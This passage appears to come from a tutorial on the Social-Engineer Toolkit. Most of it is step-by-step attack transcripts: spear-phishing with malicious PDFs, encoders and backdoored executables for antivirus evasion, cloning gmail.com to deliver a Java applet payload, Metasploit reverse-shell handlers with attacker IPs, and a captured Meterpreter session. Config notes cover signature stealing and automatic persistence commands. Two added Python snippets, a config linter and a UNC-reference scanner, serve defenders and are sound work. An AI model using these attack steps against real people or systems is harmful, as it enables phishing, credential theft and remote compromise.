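        if not ipaddress.ip_address(iface).is_loopback:
            findings.append(f"COMMAND_CENTER_INTERFACE={iface}: web GUI reachable from the network")
    except ValueError:
        findings.append(f"COMMAND_CENTER_INTERFACE={iface!r}: not an IP address")

    for key in ("WEB_PORT", "COMMAND_CENTER_PORT"):
        value = settings.get(key, "")
        if not (value.isdigit() and 1 <= int(value) <= 65535):
            findings.append(f"{key}={value!r}: not a valid TCP port")

    if is_on("WEBATTACK_SSL"):
        # The PEM paths are marked REQUIRED when SSL is on.
        for key in ("PEM_CLIENT", "PEM_SERVER"):
            if not settings.get(key):
                findings.append(f"{key} is empty but WEBATTACK_SSL=ON requires a PEM path")
        if is_on("SELF_SIGNED_CERT"):
            findings.append("SELF_SIGNED_CERT=ON: browsers will show an untrusted-certificate warning")

    if is_on("APACHE_SERVER"):
        findings.append("APACHE_SERVER=ON: only Java Applet and Metasploit methods are served; "
                        "web jacking, tabnabbing and credential harvester are not")

    if is_on("UPX_ENCODE") and not settings.get("UPX_PATH"):
        findings.append("UPX_ENCODE=ON but UPX_PATH is empty: packing will be silently disabled")

    encount = settings.get("ENCOUNT", "4")
    if not encount.isdigit() or int(encount) < 1:
        findings.append(f"ENCOUNT={encount!r}: must be a positive integer")

    return findings


if __name__ == "__main__":
    for finding in lint_set_config(parse_set_config(SAMPLE_CONFIG)):
        print("-", finding)
```

The parser deliberately ignores lines it does not understand instead of aborting, because the real file mixes comments, blank lines and a few values that contain separator characters; the linter then reasons only about the keys it knows.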
629
```
# IF THIS OPTION IS SET, THE METASPLOIT PAYLOADS WILL AUTOMATICALLY MIGRATE TO
# NOTEPAD ONCE THE APPLET IS EXECUTED. THIS IS BENEFICIAL IF THE VICTIM CLOSES
# THE BROWSER HOWEVER CAN INTRODUCE BUGGY RESULTS WHEN AUTO MIGRATING.
AUTO_MIGRATE=OFF
```

The AUTO_MIGRATE feature automatically migrates to notepad.exe when a Meterpreter shell is spawned. This is especially useful with browser exploits, because otherwise the session is terminated if the victim closes the browser.
639
```
# DIGITAL SIGNATURE STEALING METHOD MUST HAVE THE PEFILE PYTHON MODULES LOADED
# FROM http://code.google.com/p/pefile/. BE SURE TO INSTALL THIS BEFORE TURNING
# THIS FLAG ON!!! THIS FLAG GIVES MUCH BETTER AV DETECTION
DIGITAL_SIGNATURE_STEAL=ON
```

The digital signature stealing method requires the Python module pefile. It uses a technique from Didier Stevens' Disitool: the digital certificate of a Microsoft-signed binary is copied and imported into the malicious executable. A lot of times this gives better results against anti-virus detection.
649
```
# THESE TWO OPTIONS WILL TURN THE UPX PACKER TO ON AND AUTOMATICALLY ATTEMPT
# TO PACK THE EXECUTABLE WHICH MAY EVADE ANTI-VIRUS A LITTLE BETTER.
UPX_ENCODE=ON
UPX_PATH=/pentest/database/sqlmap/lib/contrib/upx/linux/upx
```

In addition to digital signature stealing, you can pack the executable with UPX. UPX is installed by default on Back|Track Linux; if this is set to ON and SET does not find the binary at UPX_PATH, it will still continue, but with UPX packing disabled.
659
```
# HERE WE CAN RUN MULTIPLE METERPRETER SCRIPTS ONCE A SESSION IS ACTIVE. THIS
# MAY BE IMPORTANT IF WE ARE SLEEPING AND NEED TO RUN PERSISTENCE, TRY TO ELEVATE
# PERMISSIONS AND OTHER TASKS IN AN AUTOMATED FASHION. FIRST TURN THIS TRIGGER ON
# THEN CONFIGURE THE FLAGS. NOTE THAT YOU NEED TO SEPERATE THE COMMANDS BY A ;
METERPRETER_MULTI_SCRIPT=OFF
#
# WHAT COMMANDS DO YOU WANT TO RUN ONCE A METERPRETER SESSION HAS BEEN ESTABLISHED.
# BE SURE IF YOU WANT MULTIPLE COMMANDS TO SEPERATE WITH A ;. FOR EXAMPLE YOU COULD DO
# run getsystem;run hashdump;run persistence TO RUN THREE DIFFERENT COMMANDS
METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
```

The next options configure which commands are run automatically once a Meterpreter session has been established. This is useful if you're getting multiple shells and want to execute specific commands to extract information from each system.
681
```
# THIS FEATURE WILL AUTO EMBED A IMG SRC TAG TO A UNC PATH OF YOUR ATTACK MACHINE.
# USEFUL IF YOU WANT TO INTERCEPT THE HALF LM KEYS WITH RAINBOWTABLES. WHAT WILL HAPPEN
# IS AS SOON AS THE VICTIM CLICKS THE WEB-PAGE LINK, A UNC PATH WILL BE INITIATED
# AND THE METASPLOIT CAPTURE/SMB MODULE WILL INTERCEPT THE HASH VALUES.
UNC_EMBED=OFF
#
```

This automatically embeds a UNC path into the web application. When the victim connects to your site, their machine tries to reach the server over a file share; that triggers an SMB challenge/response exchange, and the challenge/response pairs can be captured and used for attacking.
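From the defender's side, the tell-tale artifact of the UNC_EMBED feature is an HTML resource reference (an img, iframe or script) whose source is a UNC path or a file:// URL with a host component, since that is what makes a Windows browser start an SMB connection. The following is an added example that is not part of SET or of the original post: a Python scanner built on the standard-library html.parser that flags such references in captured page content (proxy logs, mail-gateway sandboxes, or a phishing page under analysis). The sample HTML is constructed for the example and the host names in it are placeholders.

```python
"""Flag HTML resource references that would trigger an outbound SMB connection."""
import re
from html.parser import HTMLParser
from typing import List, Tuple

# Constructed sample page: one normal image, plus two UNC-style references of
# the kind described above. Hosts and shares are placeholders, not real targets.
SAMPLE_HTML = """
<html><body>
<img src="/static/logo.png">
<img src="\\\\10.0.0.5\\share\\x.jpg" width="1" height="1">
<iframe src="file://fileserver.example/share/page.html"></iframe>
<a href="https://example.com/">ok</a>
</body></html>
"""

# (tag, attribute) pairs a browser fetches automatically while rendering.
RESOURCE_ATTRS = {("img", "src"), ("script", "src"), ("iframe", "src"),
                  ("link", "href"), ("embed", "src"), ("object", "data")}

# A UNC path (\\host\share\...) or a file:// URL with a non-empty host part.
# file:///C:/... has an empty host and is a local path, so it is not matched.
UNC_RE = re.compile(r"^(\\\\[^\\]+\\|file://[^/]+/)", re.IGNORECASE)


class UncReferenceScanner(HTMLParser):
    """Collect (tag, attribute, value) triples whose value is a UNC reference."""

    def __init__(self) -> None:
        super().__init__()
        self.hits: List[Tuple[str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        # html.parser lower-cases tag and attribute names for us; attribute
        # values are returned verbatim, so the backslashes survive.
        for name, value in attrs:
            if (tag, name) in RESOURCE_ATTRS and value and UNC_RE.match(value.strip()):
                self.hits.append((tag, name, value))


def find_unc_references(html: str) -> List[Tuple[str, str, str]]:
    """Return every auto-fetched resource reference pointing at a UNC path."""
    scanner = UncReferenceScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.hits


if __name__ == "__main__":
    for tag, attr, value in find_unc_references(SAMPLE_HTML):
        print(f"<{tag} {attr}={value!r}> would trigger an SMB connection")
```

A hit in mail or proxy content is a strong signal on its own; the page's description of the attack also shows why blocking outbound SMB (TCP 445) from workstations at the network edge removes the effect entirely, whatever the page looks like.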
SET Menus

SET is a menu-driven attack system, which is fairly unique among hacker tools. The decision not to make it command-line driven was made because of how social-engineering attacks occur: they require multiple scenarios, options, and customizations. A command-line tool would have really limited the effectiveness of the attacks and the ability to fully customize them for your target. Let's dive into the menu and do a brief walkthrough of each attack vector.
698
```
root@bt:/pentest/exploits/set# ./set

 _______________________________
 / _____/\_ _____/\__ ___/
 \_____ \ | __)_ | |
 / \ | \ | |
 /_______ //_______ / |____|
 \/ \/

 [---] The Social-Engineer Toolkit (SET) [---]
 [---] Created by: David Kennedy (ReL1K) [---]
 [---] Development Team: JR DePre (pr1me) [---]
 [---] Development Team: Joey Furr (j0fer) [---]
 [---] Development Team: Thomas Werth [---]
 [---] Development Team: Garland [---]
 [---] Report bugs: davek@trustedsec.com [---]
 [---] Follow me on Twitter: dave_rel1k [---]
 [---] Homepage: https://www.trustedsec.com [---]

 Welcome to the Social-Engineer Toolkit (SET). Your one
 stop shop for all of your social-engineering needs..

 Join us on irc.freenode.net in channel #setoolkit

 The Social-Engineer Toolkit is a product of TrustedSec.

 Visit: https://www.trustedsec.com

 Select from the menu:

 1) Spear-Phishing Attack Vectors
 2) Website Attack Vectors
 3) Infectious Media Generator
 4) Create a Payload and Listener
 5) Mass Mailer Attack
 6) Arduino-Based Attack Vector
 7) SMS Spoofing Attack Vector
 8) Wireless Access Point Attack Vector
 9) QRCode Generator Attack Vector
 10) Powershell Attack Vectors
 11) Third Party Modules

 99) Return back to the main menu.

 set> 1

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice:
```

The spear-phishing attack menu is used for performing targeted email attacks against a victim. You can send multiple emails based on the addresses you harvested, or you can send to individuals. You can also use a file-format exploit (for example a PDF bug) and send the malicious attachment to the victim in order to hopefully compromise the system.
786
```
Select from the menu:

 1) Spear-Phishing Attack Vectors
 2) Website Attack Vectors
 3) Infectious Media Generator
 4) Create a Payload and Listener
 5) Mass Mailer Attack
 6) Arduino-Based Attack Vector
 7) SMS Spoofing Attack Vector
 8) Wireless Access Point Attack Vector
 9) QRCode Generator Attack Vector
 10) Powershell Attack Vectors
 11) Third Party Modules

 99) Return back to the main menu.

 set> 2

The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

Enter what type of attack you would like to utilize.

The Java Applet attack will spoof a Java Certificate and deliver a Metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit browser exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

The TabNabbing Method will wait for a user to move to a different tab, then refresh the page to something different.

The Man Left in the Middle Attack Method was introduced by Kos and utilizes HTTP REFERER's in order to intercept fields and harvest data from them. You need to have an already vulnerable site and incorporate <script src="http://YOURIP/">. This could either be from a compromised site or through XSS.

The web jacking attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its to slow/fast.

The multi-attack will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.

 1) Java Applet Attack Method
 2) Metasploit Browser Exploit Method
 3) Credential Harvester Attack Method
 4) Tabnabbing Attack Method
 5) Man Left in the Middle Attack Method
 6) Web Jacking Attack Method
 7) Multi-Attack Web Method
 8) Victim Web Profiler
 9) Create or import a CodeSigning Certificate

 99) Return to Main Menu

 set:webattack>
```

The web attack vector is used by performing phishing attacks against the victim in the hope that they click the link. There is a wide variety of attacks that can occur once they click. We will dive into each one of the attacks later on.
864
3. Infectious Media Generator

The infectious USB/DVD creator will generate a Metasploit-based payload for you and craft an autorun.inf file that, once burned to a DVD or placed on a USB stick, triggers the autorun feature and hopefully compromises the system. This attack vector is relatively simple in nature and relies on deploying the devices to the physical system.

4. Create a Payload and Listener

The create payload and listener option is an extremely simple wrapper around Metasploit: it creates a payload, exports the exe for you, and starts a listener. You would need to transfer the exe onto the victim machine and execute it for it to work.

5. Mass Mailer Attack

The mass mailer attack allows you to send multiple emails to victims and customize the messages. This option does not create payloads, so it is generally used to perform a mass phishing attack.
876
```
Select from the menu:

 1) Spear-Phishing Attack Vectors
 2) Website Attack Vectors
 3) Infectious Media Generator
 4) Create a Payload and Listener
 5) Mass Mailer Attack
 6) Arduino-Based Attack Vector
 7) SMS Spoofing Attack Vector
 8) Wireless Access Point Attack Vector
 9) QRCode Generator Attack Vector
 10) Powershell Attack Vectors
 11) Third Party Modules

 99) Return back to the main menu.

set> 6

The Arduino-Based Attack Vector utilizes the Arduin-based device to
 program the device. You can leverage the Teensy's, which have onboard
 storage and can allow for remote code execution on the physical
 system. Since the devices are registered as USB Keyboard's it
 will bypass any autorun disabled or endpoint protection on the
 system.

 You will need to purchase the Teensy USB device, it's roughly
 $22 dollars. This attack vector will auto generate the code
 needed in order to deploy the payload on the system for you.

 This attack vector will create the .pde files necessary to import
 into Arduino (the IDE used for programming the Teensy). The attack
 vectors range from Powershell based downloaders, wscript attacks,
 and other methods.

 For more information on specifications and good tutorials visit:
 http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle

 To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html

 Special thanks to: IronGeek, WinFang, and Garland

 This attack vector also attacks X10 based controllers, be sure to be leveraging
 X10 based communication devices in order for this to work.

 Select a payload to create the pde file to import into Arduino:

 1) Powershell HTTP GET MSF Payload
 2) WSCRIPT HTTP GET MSF Payload
 3) Powershell based Reverse Shell Payload
 4) Internet Explorer/FireFox Beef Jack Payload
 5) Go to malicious java site and accept applet Payload
 6) Gnome wget Download Payload
 7) Binary 2 Teensy Attack (Deploy MSF payloads)
 8) SDCard 2 Teensy Attack (Deploy Any EXE)
 9) SDCard 2 Teensy Attack (Deploy on OSX)
 10) X10 Arduino Sniffer PDE and Libraries
 11) X10 Arduino Jammer PDE and Libraries
 12) Powershell Direct ShellCode Teensy Attack

 99) Return to Main Menu

set:arduino>
```

The Teensy USB HID attack works by purchasing a hardware device from pjrc.com and programming it so that the small USB microcontroller looks and behaves exactly like a keyboard. The important part is that this bypasses autorun restrictions and can drop payloads onto the system from the onboard flash memory. The keyboard simulation allows you to type characters in a way that can drive downloaders and exploit the system.
Spear-Phishing Attack Vector

As mentioned previously, the spear-phishing attack vector can be used to send targeted emails with malicious attachments. In this example we are going to craft an attack, integrate it with Gmail, and send a malicious PDF to the victim. One thing to note is that you can create and save your own templates for future SE attacks, or you can use the pre-built ones. Also note that when you press enter to accept the SET defaults, the reverse connection will always use port 443 and a reverse Meterpreter payload.
977
```
Select from the menu:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Wireless Access Point Attack Vector
9. Third Party Modules
10. Update the Metasploit Framework
11. Update the Social-Engineer Toolkit
12. Help, Credits, and About
13. Exit the Social-Engineer Toolkit

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

set:phishing>1

Select the file format exploit you want.
The default is the PDF embedded EXE.

 ********** PAYLOADS **********

 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
 2) SET Custom Written Document UNC LM SMB Capture Attack
 3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
 4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
 5) Adobe Flash Player "Button" Remote Code Execution
 6) Adobe CoolType SING Table "uniqueName" Overflow
 7) Adobe Flash Player "newfunction" Invalid Pointer Use
 8) Adobe Collab.collectEmailInfo Buffer Overflow
 9) Adobe Collab.getIcon Buffer Overflow
 10) Adobe JBIG2Decode Memory Corruption Exploit
 11) Adobe PDF Embedded EXE Social Engineering
 12) Adobe util.printf() Buffer Overflow
 13) Custom EXE to VBA (sent via RAR) (RAR required)
 14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
 15) Adobe PDF Embedded EXE Social Engineering (NOJS)
 16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
 17) Apple QuickTime PICT PnSize Buffer Overflow
 18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
 19) Adobe Reader u3D Memory Corruption Vulnerability
 20) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

 set:payloads> 1

What payload do you want to generate:

 Name:                                   Description:

 1) Windows Shell Reverse_TCP            Spawn a command shell on victim and send back to attacker
 2) Windows Reverse_TCP Meterpreter      Spawn a meterpreter shell on victim and send back to attacker
 3) Windows Reverse_TCP VNC DLL          Spawn a VNC server on victim and send back to attacker
 4) Windows Bind Shell                   Execute payload and create an accepting port on remote system
 5) Windows Bind Shell X64               Windows x64 Command Shell, Bind TCP Inline
 6) Windows Shell Reverse_TCP X64        Windows X64 Command Shell, Reverse TCP Inline
 7) Windows Meterpreter Reverse_TCP X64  Connect back to the attacker (Windows x64), Meterpreter
 8) Windows Meterpreter Egress Buster    Spawn a meterpreter shell and find a port home via multiple ports
 9) Windows Meterpreter Reverse HTTPS    Tunnel communication over HTTP using SSL and use Meterpreter
 10) Windows Meterpreter Reverse DNS     Use a hostname instead of an IP address and spawn Meterpreter
 11) SE Toolkit Interactive Shell        Custom interactive reverse toolkit designed for SET
 12) SE Toolkit HTTP Reverse Shell       Purely native HTTP shell with AES encryption support
 13) RATTE HTTP Tunneling Payload        Security bypass payload that will tunnel all comms over HTTP
 14) ShellCodeExec Alphanum Shellcode    This will drop a meterpreter payload through shellcodeexec (A/V Safe)
 15) Import your own executable          Specify a path for your own executable

set:payloads> 1

Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.

 1) avoid_utf8_tolower (Normal)
 2) shikata_ga_nai (Very Good)
 3) alpha_mixed (Normal)
 4) alpha_upper (Normal)
 5) call4_dword_xor (Normal)
 6) countdown (Normal)
 7) fnstenv_mov (Normal)
 8) jmp_call_additive (Normal)
 9) nonalpha (Normal)
 10) nonupper (Normal)
 11) unicode_mixed (Normal)
 12) unicode_upper (Normal)
 13) alpha2 (Normal)
 14) No Encoding (None)
 15) Multi-Encoder (Excellent)
 16) Backdoored Executable (BEST)

set:encoding> 16
set:payloads> PORT of the listener [443]
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 172.16.32.129:443
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.

As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

Enter your choice (enter for default): 1
Keeping the filename and moving on.

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1

Do you want to use a predefined template or craft a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 1

Below is a list of available templates:

1: Baby Pics
2: Strange Internet usage from your computer
3: New Update
4: LOL...have to check this out...
5: Dan Brown's Angels & Demons
6: Computer Issue
7: Status Report

Enter the number you want to use: 7

Enter who you want to send email to: davek@fakeaddress.com

What option do you want to use?

1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1

Enter your GMAIL email address: davek@fakeaddress.com
Enter your password for gmail (it will not be displayed back to you):

SET has finished delivering the emails

Do you want to setup a listener yes or no: yes

[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

_ _
/ \ / \ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
 |/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\

 =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 891 exploits - 484 auxiliary - 149 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
 =[ svn r15540 updated 23 days ago (2012.06.27)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...
msf exploit(handler) >
```
1329
Once the attack is all set up, the victim opens the email and then the PDF. As soon as the victim opens the attachment, a shell is presented back to us:

```
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1139) at Thu Sep 09 09:58:06 -0400 2010

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3940 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>
```

The spear-phishing attack can send to multiple people or to individuals, it integrates with Gmail, and it can be completely customized to your needs for the attack. Overall this is very effective for email spear-phishing.
Java Applet Attack Vector

The Java Applet is one of the core attack vectors within SET and has the highest success rate for compromise. The Java Applet attack creates a malicious Java applet that, once run, completely compromises the victim. The neat trick with SET is that you can completely clone a website, and once the victim has clicked run, it redirects the victim back to the original site, making the attack much more believable. This attack vector affects Windows, Linux, and OSX and can compromise them all. Remember that if you want to customize this attack vector, edit config/set_config to change the self-signed certificate information. In this specific attack vector you can select web templates, which are pre-defined websites that have already been harvested, or you can import your own website. In this example we will be using the site cloner, which clones a website for us. Let's launch SET and prep our attack.
1358
1359Select from the menu:
1360
1361 1) Spear-Phishing Attack Vectors
1362
1363 2) Website Attack Vectors
1364
1365 3) Infectious Media Generator
1366
1367 4) Create a Payload and Listener
1368
1369 5) Mass Mailer Attack
1370
1371 6) Arduino-Based Attack Vector
1372
1373 7) SMS Spoofing Attack Vector
1374
1375 8) Wireless Access Point Attack Vector
1376
1377 9) QRCode Generator Attack Vector
1378
1379 10) Powershell Attack Vectors
1380
1381 11) Third Party Modules
1382
1383 99) Return back to the main menu.
1384
1385set> 2
1386
1387The Web Attack module is a unique way of utilizing multiple web-based attacks
1388
1389 in order to compromise the intended victim.
1390
1391 The Java Applet Attack method will spoof a Java Certificate and deliver a
1392
1393 metasploit based payload. Uses a customized java applet created by Thomas
1394
1395 Werth to deliver the payload.
1396
1397 The Metasploit Browser Exploit method will utilize select Metasploit
1398
1399 browser exploits through an iframe and deliver a Metasploit payload.
1400
1401 The Credential Harvester method will utilize web cloning of a web-
1402
1403 site that has a username and password field and harvest all the
1404
1405 information posted to the website
1406
1407 The TabNabbing method will wait for a user to move to a different
1408
1409 tab, then refresh the page to something different.
1410
1411 The Man Left in the Middle Attack method was introduced by Kos and
1412
1413 utilizes HTTP REFERER’s in order to intercept fields and harvest
1414
1415 data from them. You need to have an already vulnerable site and in-
1416
1417 corporate <script src=”http://YOURIP/”>. This could either be from a
1418
1419 compromised site or through XSS.
1420
1421 The Web-Jacking Attack method was introduced by white_sheep, Emgent
1422
1423 and the Back|Track team. This method utilizes iframe replacements to
1424
1425 make the highlighted URL link to appear legitimate however when clicked
1426
1427 a window pops up then is replaced with the malicious link. You can edit
1428
1429 the link replacement settings in the set_config if its too slow/fast.
1430
1431 The Multi-Attack method will add a combination of attacks through the web attack
1432
1433 menu. For example you can utilize the Java Applet, Metasploit Browser,
1434
1435 Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
1436
1437 all at once to see which is successful.
1438
```
 1) Java Applet Attack Method
 2) Metasploit Browser Exploit Method
 3) Credential Harvester Attack Method
 4) Tabnabbing Attack Method
 5) Man Left in the Middle Attack Method
 6) Web Jacking Attack Method
 7) Multi-Attack Web Method
 8) Victim Web Profiler
 9) Create or import a CodeSigning Certificate
99) Return to Main Menu

set:webattack> 1

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

 1) Web Templates
 2) Site Cloner
 3) Custom Import
99) Return to Webattack Menu

set:webattack> 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com

[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: QZ7R7NT
[*] Malicious java applet website prepped for deployment

What payload do you want to generate:

 Name:                                    Description:

 1) Windows Shell Reverse_TCP             Spawn a command shell on victim and send back to attacker
 2) Windows Reverse_TCP Meterpreter       Spawn a meterpreter shell on victim and send back to attacker
 3) Windows Reverse_TCP VNC DLL           Spawn a VNC server on victim and send back to attacker
 4) Windows Bind Shell                    Execute payload and create an accepting port on remote system
 5) Windows Bind Shell X64                Windows x64 Command Shell, Bind TCP Inline
 6) Windows Shell Reverse_TCP X64         Windows X64 Command Shell, Reverse TCP Inline
 7) Windows Meterpreter Reverse_TCP X64   Connect back to the attacker (Windows x64), Meterpreter
 8) Windows Meterpreter Egress Buster     Spawn a meterpreter shell and find a port home via multiple ports
 9) Windows Meterpreter Reverse HTTPS     Tunnel communication over HTTP using SSL and use Meterpreter
10) Windows Meterpreter Reverse DNS       Use a hostname instead of an IP address and spawn Meterpreter
11) SE Toolkit Interactive Shell          Custom interactive reverse toolkit designed for SET
12) SE Toolkit HTTP Reverse Shell         Purely native HTTP shell with AES encryption support
13) RATTE HTTP Tunneling Payload          Security bypass payload that will tunnel all comms over HTTP
14) ShellCodeExec Alphanum Shellcode      This will drop a meterpreter payload through shellcodeexec (A/V Safe)
15) Import your own executable            Specify a path for your own executable

set:payloads> 2

Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.

 1. avoid_utf8_tolower (Normal)
 2. shikata_ga_nai (Very Good)
 3. alpha_mixed (Normal)
 4. alpha_upper (Normal)
 5. call4_dword_xor (Normal)
 6. countdown (Normal)
 7. fnstenv_mov (Normal)
 8. jmp_call_additive (Normal)
 9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default): 16

[-] Enter the PORT of the listener (enter for default): 443
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.

********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************

Enter choice yes or no: yes
Enter the port to listen for on OSX: 8080
Enter the port to listen for on Linux: 8081

Created by msfpayload (http://www.metasploit.com).
Payload: osx/x86/shell_reverse_tcp
 Length: 65
Options: LHOST=172.16.32.129,LPORT=8080

Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
 Length: 50
Options: LHOST=172.16.32.129,LPORT=8081

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--]

[*] Launching MSF Listener...
[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 891 exploits - 484 auxiliary - 149 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15540 updated 23 days ago (2012.06.27)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 8080
LPORT => 8080
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
[*] Started reverse handler on 0.0.0.0:443
resource (src/program_junk/meta_config)> exploit -j
[*] Starting the payload handler...
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 8081
LPORT => 8081
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> set AutoRunScript migrate -f
[*] Started reverse handler on 172.16.32.129:8080
AutoRunScript => migrate -f
resource (src/program_junk/meta_config)> exploit -j
[*] Starting the payload handler...
